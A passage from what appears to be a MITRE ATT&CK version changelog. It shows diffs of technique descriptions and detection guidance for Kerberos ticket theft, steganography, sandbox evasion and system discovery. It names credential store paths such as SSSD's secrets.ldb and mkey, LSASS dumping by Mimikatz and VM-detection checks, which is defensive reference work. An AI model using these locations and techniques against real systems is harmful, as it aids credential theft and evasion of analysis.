 >rotocol, which uses the caller's environment to determine ac
 >cess. The storage location for these ccache entries is influ
 >enced by the <code>/etc/krb5.conf</code> configuration file 
 >and the <code>KRB5CCNAME</code> environment variable which c
 >an specify to save them to disk or keep them protected via t
 >he KCM daemon. Users can interact with ticket storage using 
 ><code>kinit</code>, <code>klist</code>, <code>ktutil</code>,
 > and <code>kcc</code> built-in binaries or via Apple's nativ
 >e Kerberos framework. Adversaries can use open source tools 
 >to interact with the ccache files directly or to use the Ker
 >beros framework to call lower-level APIs for extracting the 
 >user's TGT or Service Tickets.(Citation: SpectorOps Bifrost 
 >Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
 > 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Tim (Wadhwa-)Brown', 'Cody Thomas, SpecterOps']
x_mitre_permissions_required['User', 'root']
values_changed
STIX FieldOld valueNew Value
modified2020-11-05 16:07:04.189000+00:002021-10-14 22:56:22.054000+00:00
descriptionAdversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access. On Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist) Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
external_references[3]['source_name']ADSecurity Detecting Forged TicketsMicrosoft Klist
external_references[3]['description']Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.Microsoft. (2021, March 3). klist. Retrieved October 14, 2021.
external_references[3]['url']https://adsecurity.org/?p=1515https://docs.microsoft.com/windows-server/administration/windows-commands/klist
external_references[4]['source_name']Stealthbits Detect PtT 2019MIT ccache
external_references[4]['description']Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket Attacks. Retrieved February 27, 2020.Massachusetts Institute of Technology. (n.d.). MIT Kerberos Documentation: Credential Cache. Retrieved October 4, 2021.
external_references[4]['url']https://blog.stealthbits.com/detect-pass-the-ticket-attackshttps://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
external_references[5]['source_name']CERT-EU Golden Ticket ProtectionLinux Kerberos Tickets
external_references[5]['description']Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red Teams. Retrieved October 4, 2021.
external_references[5]['url']https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdfhttps://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
external_references[6]['source_name']Microsoft Kerberos Golden TicketBrining MimiKatz to Unix
external_references[6]['description']Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated). Retrieved February 27, 2020.Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.
external_references[6]['url']https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
external_references[7]['source_name']Microsoft Detecting Kerberoasting Feb 2018Kekeo
external_references[7]['description']Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
external_references[7]['url']https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/https://github.com/gentilkiwi/kekeo
external_references[8]['source_name']AdSecurity Cracking Kerberos Dec 2015SpectorOps Bifrost Kerberos macOS 2019
external_references[8]['description']Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost. Retrieved October 6, 2021.
external_references[8]['url']https://adsecurity.org/?p=2293https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
external_references[9]['source_name']Medium Detecting Attempts to Steal Passwords from MemorymacOS kerberos framework MIT
external_references[9]['description']French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.Massachusetts Institute of Technology. (2007, October 27). Kerberos for Macintosh Preferences Documentation. Retrieved October 6, 2021.
external_references[9]['url']https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4eahttp://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
x_mitre_detectionMonitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection) Monitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket) Monitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015) Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection) Monitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket) Monitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015) Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored. Monitor for unusual processes accessing secrets.ldb and .secrets.mkey located in /var/lib/sss/secrets/.
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ADSecurity Detecting Forged Tickets', 'description': 'Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.', 'url': 'https://adsecurity.org/?p=1515'}
external_references{'source_name': 'Stealthbits Detect PtT 2019', 'description': 'Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket Attacks. Retrieved February 27, 2020.', 'url': 'https://blog.stealthbits.com/detect-pass-the-ticket-attacks'}
external_references{'source_name': 'CERT-EU Golden Ticket Protection', 'description': 'Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.', 'url': 'https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf'}
external_references{'source_name': 'Microsoft Kerberos Golden Ticket', 'description': 'Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated). Retrieved February 27, 2020.', 'url': 'https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285'}
external_references{'source_name': 'Microsoft Detecting Kerberoasting Feb 2018', 'description': 'Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.', 'url': 'https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/'}
external_references{'source_name': 'AdSecurity Cracking Kerberos Dec 2015', 'description': 'Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.', 'url': 'https://adsecurity.org/?p=2293'}
external_references{'source_name': 'Medium Detecting Attempts to Steal Passwords from Memory', 'description': 'French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.', 'url': 'https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea'}
x_mitre_data_sourcesFile: File Access
x_mitre_data_sourcesCommand: Command Execution
x_mitre_platformsLinux
x_mitre_platformsmacOS

[T1027.003] Obfuscated Files or Information: Steganography

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-09-16 19:24:20.350000+00:002021-10-15 16:46:56.760000+00:00
x_mitre_data_sources[0]File: File ContentFile: File Metadata
x_mitre_detectionDetection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings are other signatures left in system artifacts related to decoding steganography.Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings or other signatures left in system artifacts related to decoding steganography.
x_mitre_version1.11.2

[T1553] Subvert Trust Controls

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 15:41:39.612000+00:002021-10-14 21:18:32.225000+00:00
x_mitre_version1.01.1

[T1497.001] Virtualization/Sandbox Evasion: System Checks

Current version: 2.1

Version changed from: 2.0 → 2.1


Old Description
New Description
t1Adversaries may employ various system checks to detect and at1Adversaries may employ various system checks to detect and a
>void virtualization and analysis environments. This may incl>void virtualization and analysis environments. This may incl
>ude changing behaviors based on the results of checks for th>ude changing behaviors based on the results of checks for th
>e presence of artifacts indicative of a virtual machine envi>e presence of artifacts indicative of a virtual machine envi
>ronment (VME) or sandbox. If the adversary detects a VME, th>ronment (VME) or sandbox. If the adversary detects a VME, th
>ey may alter their malware to disengage from the victim or c>ey may alter their malware to disengage from the victim or c
>onceal the core functions of the implant. They may also sear>onceal the core functions of the implant. They may also sear
>ch for VME artifacts before dropping secondary or additional>ch for VME artifacts before dropping secondary or additional
> payloads. Adversaries may use the information learned from > payloads. Adversaries may use the information learned from 
>[Virtualization/Sandbox Evasion](https://attack.mitre.org/te>[Virtualization/Sandbox Evasion](https://attack.mitre.org/te
>chniques/T1497) during automated discovery to shape follow-o>chniques/T1497) during automated discovery to shape follow-o
>n behaviors.   Specific checks will vary based on the target>n behaviors.(Citation: Deloitte Environment Awareness)  Spec
> and/or adversary, but may involve behaviors such as [Window>ific checks will vary based on the target and/or adversary, 
>s Management Instrumentation](https://attack.mitre.org/techn>but may involve behaviors such as [Windows Management Instru
>iques/T1047), [PowerShell](https://attack.mitre.org/techniqu>mentation](https://attack.mitre.org/techniques/T1047), [Powe
>es/T1059/001), [System Information Discovery](https://attack>rShell](https://attack.mitre.org/techniques/T1059/001), [Sys
>.mitre.org/techniques/T1082), and [Query Registry](https://a>tem Information Discovery](https://attack.mitre.org/techniqu
>ttack.mitre.org/techniques/T1012) to obtain system informati>es/T1082), and [Query Registry](https://attack.mitre.org/tec
>on and search for VME artifacts. Adversaries may search for >hniques/T1012) to obtain system information and search for V
>VME artifacts in memory, processes, file system, hardware, a>ME artifacts. Adversaries may search for VME artifacts in me
>nd/or the Registry. Adversaries may use scripting to automat>mory, processes, file system, hardware, and/or the Registry.
>e these checks  into one script and then have the program ex> Adversaries may use scripting to automate these checks  int
>it if it determines the system to be a virtual environment. >o one script and then have the program exit if it determines
>  Checks could include generic system properties such as hos> the system to be a virtual environment.   Checks could incl
>t/domain name and samples of network traffic. Adversaries ma>ude generic system properties such as host/domain name and s
>y also check the network adapters addresses, CPU core count,>amples of network traffic. Adversaries may also check the ne
> and available memory/drive size.   Other common checks may >twork adapters addresses, CPU core count, and available memo
>enumerate services running that are unique to these applicat>ry/drive size.   Other common checks may enumerate services 
>ions, installed programs on the system, manufacturer/product>running that are unique to these applications, installed pro
> fields for strings relating to virtual machine applications>grams on the system, manufacturer/product fields for strings
>, and VME-specific hardware/processor instructions.(Citation> relating to virtual machine applications, and VME-specific 
>: McAfee Virtual Jan 2017) In applications like VMWare, adve>hardware/processor instructions.(Citation: McAfee Virtual Ja
>rsaries can also use a special I/O port to send commands and>n 2017) In applications like VMWare, adversaries can also us
> receive output.    Hardware checks, such as the presence of>e a special I/O port to send commands and receive output.   
> the fan, temperature, and audio devices, could also be used> Hardware checks, such as the presence of the fan, temperatu
> to gather evidence that can be indicative a virtual environ>re, and audio devices, could also be used to gather evidence
>ment. Adversaries may also query for specific readings from > that can be indicative a virtual environment. Adversaries m
>these devices.(Citation: Unit 42 OilRig Sept 2018)>ay also query for specific readings from these devices.(Cita
 >tion: Unit 42 OilRig Sept 2018)

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-21 15:16:10.604000+00:002021-10-18 14:57:07.973000+00:00
descriptionAdversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness) Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)
external_references[1]['source_name']McAfee Virtual Jan 2017Deloitte Environment Awareness
external_references[1]['description']Roccia, T. (2017, January 19). Stopping Malware With a Fake Virtual Machine. Retrieved April 17, 2019.Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved May 18, 2021.
external_references[1]['url']https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
external_references[2]['source_name']Unit 42 OilRig Sept 2018McAfee Virtual Jan 2017
external_references[2]['description']Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.Roccia, T. (2017, January 19). Stopping Malware With a Fake Virtual Machine. Retrieved April 17, 2019.
external_references[2]['url']https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
x_mitre_version2.02.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Unit 42 OilRig Sept 2018', 'description': 'Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.', 'url': 'https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/'}

[T1082] System Information Discovery

Current version: 2.3

Version changed from: 2.2 → 2.3


Old Description
New Description
t1An adversary may attempt to get detailed information about tt1An adversary may attempt to get detailed information about t
>he operating system and hardware, including version, patches>he operating system and hardware, including version, patches
>, hotfixes, service packs, and architecture. Adversaries may>, hotfixes, service packs, and architecture. Adversaries may
> use the information from [System Information Discovery](htt> use the information from [System Information Discovery](htt
>ps://attack.mitre.org/techniques/T1082) during automated dis>ps://attack.mitre.org/techniques/T1082) during automated dis
>covery to shape follow-on behaviors, including whether or no>covery to shape follow-on behaviors, including whether or no
>t the adversary fully infects the target and/or attempts spe>t the adversary fully infects the target and/or attempts spe
>cific actions.  Tools such as [Systeminfo](https://attack.mi>cific actions.  Tools such as [Systeminfo](https://attack.mi
>tre.org/software/S0096) can be used to gather detailed syste>tre.org/software/S0096) can be used to gather detailed syste
>m information. A breakdown of system data can also be gather>m information. If running with privileged access, a breakdow
>ed through the macOS <code>systemsetup</code> commandbut i>n of system data can be gathered through the <code>systemset
>t requires administrative privileges.  Infrastructure as a S>up</code> configuration tool on macOS. As an example, advers
>ervice (IaaS) cloud providers such as AWS, GCP, and Azure al>aries with user-level access can execute the <code>df -aH</c
>low access to instance and virtual machine information via A>ode> command to obtain currently mounted disks and associate
>PIs. Successful authenticated API calls can return data such>d freely available space. [System Information Discovery](htt
> as the operating system platform and status of a particular>ps://attack.mitre.org/techniques/T1082) combined with inform
> instance or the model view of a virtual machine.(Citation: >ation gathered from other forms of discovery and reconnaissa
>Amazon Describe Instance)(Citation: Google Instances Resourc>nce can drive payload development and concealment.(Citation:
>e)(Citation: Microsoft Virutal Machine API)> OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniqu
 >es)  Infrastructure as a Service (IaaS) cloud providers such
 > as AWS, GCP, and Azure allow access to instance and virtual
 > machine information via APIs. Successful authenticated API 
 >calls can return data such as the operating system platform 
 >and status of a particular instance or the model view of a v
 >irtual machine.(Citation: Amazon Describe Instance)(Citation
 >: Google Instances Resource)(Citation: Microsoft Virutal Mac
 >hine API)

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-03-08 10:33:01.066000+00:002021-10-13 23:21:27.750000+00:00
descriptionAn adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS systemsetup command, but it requires administrative privileges. Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques) Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)
external_references[2]['source_name']Amazon Describe InstanceOSX.FairyTale
external_references[2]['description']Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020.Phile Stokes. (2018, September 20). On the Trail of OSX.FairyTale | Adware Playing at Malware. Retrieved August 24, 2021.
external_references[2]['url']https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.htmlhttps://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/
external_references[3]['source_name']Google Instances Resource20 macOS Common Tools and Techniques
external_references[3]['description']Google. (n.d.). Rest Resource: instance. Retrieved March 3, 2020.Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
external_references[3]['url']https://cloud.google.com/compute/docs/reference/rest/v1/instanceshttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
external_references[4]['source_name']Microsoft Virutal Machine APIAmazon Describe Instance
external_references[4]['description']Microsoft. (2019, March 1). Virtual Machines - Get. Retrieved October 8, 2019.Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020.
external_references[4]['url']https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/gethttps://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
x_mitre_version2.22.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Google Instances Resource', 'description': 'Google. (n.d.). Rest Resource: instance. Retrieved March 3, 2020.', 'url': 'https://cloud.google.com/compute/docs/reference/rest/v1/instances'}
external_references{'source_name': 'Microsoft Virutal Machine API', 'description': 'Microsoft. (2019, March 1). Virtual Machines - Get. Retrieved October 8, 2019.', 'url': 'https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get'}
x_mitre_contributorsMaril Vernon @shewhohacks

[T1016] System Network Configuration Discovery

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may look for details about the network configurat1Adversaries may look for details about the network configura
>tion and settings of systems they access or through informat>tion and settings, such as IP and/or MAC addresses, of syste
>ion discovery of remote systems. Several operating system ad>ms they access or through information discovery of remote sy
>ministration utilities exist that can be used to gather this>stems. Several operating system administration utilities exi
> information. Examples include [Arp](https://attack.mitre.or>st that can be used to gather this information. Examples inc
>g/software/S0099), [ipconfig](https://attack.mitre.org/softw>lude [Arp](https://attack.mitre.org/software/S0099), [ipconf
>are/S0100)/[ifconfig](https://attack.mitre.org/software/S010>ig](https://attack.mitre.org/software/S0100)/[ifconfig](http
>1), [nbtstat](https://attack.mitre.org/software/S0102), and >s://attack.mitre.org/software/S0101), [nbtstat](https://atta
>[route](https://attack.mitre.org/software/S0103).  Adversari>ck.mitre.org/software/S0102), and [route](https://attack.mit
>es may use the information from [System Network Configuratio>re.org/software/S0103).  Adversaries may use the information
>n Discovery](https://attack.mitre.org/techniques/T1016) duri> from [System Network Configuration Discovery](https://attac
>ng automated discovery to shape follow-on behaviors, includi>k.mitre.org/techniques/T1016) during automated discovery to 
>ng whether or not the adversary fully infects the target and>shape follow-on behaviors, including determining certain acc
>/or attempts specific actions.>ess within the target network and what actions to do next. 

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-24 13:13:49.594000+00:002021-10-08 00:17:37.881000+00:00
descriptionAdversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103). Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103). Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.
x_mitre_version1.21.3

[T1033] System Owner/User Discovery

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may attempt to identify the primary user, current1Adversaries may attempt to identify the primary user, curren
>tly logged in user, set of users that commonly uses a system>tly logged in user, set of users that commonly uses a system
>, or whether a user is actively using the system. They may d>, or whether a user is actively using the system. They may d
>o this, for example, by retrieving account usernames or by u>o this, for example, by retrieving account usernames or by u
>sing [OS Credential Dumping](https://attack.mitre.org/techni>sing [OS Credential Dumping](https://attack.mitre.org/techni
>ques/T1003). The information may be collected in a number of>ques/T1003). The information may be collected in a number of
> different ways using other Discovery techniques, because us> different ways using other Discovery techniques, because us
>er and username details are prevalent throughout a system an>er and username details are prevalent throughout a system an
>d include running process ownership, file/directory ownershi>d include running process ownership, file/directory ownershi
>p, session information, and system logs. Adversaries may use>p, session information, and system logs. Adversaries may use
> the information from [System Owner/User Discovery](https://> the information from [System Owner/User Discovery](https://
>attack.mitre.org/techniques/T1033) during automated discover>attack.mitre.org/techniques/T1033) during automated discover
>y to shape follow-on behaviors, including whether or not the>y to shape follow-on behaviors, including whether or not the
> adversary fully infects the target and/or attempts specific> adversary fully infects the target and/or attempts specific
> actions.  Utilities and commands that acquire this informat> actions.  Various utilities and commands may acquire this i
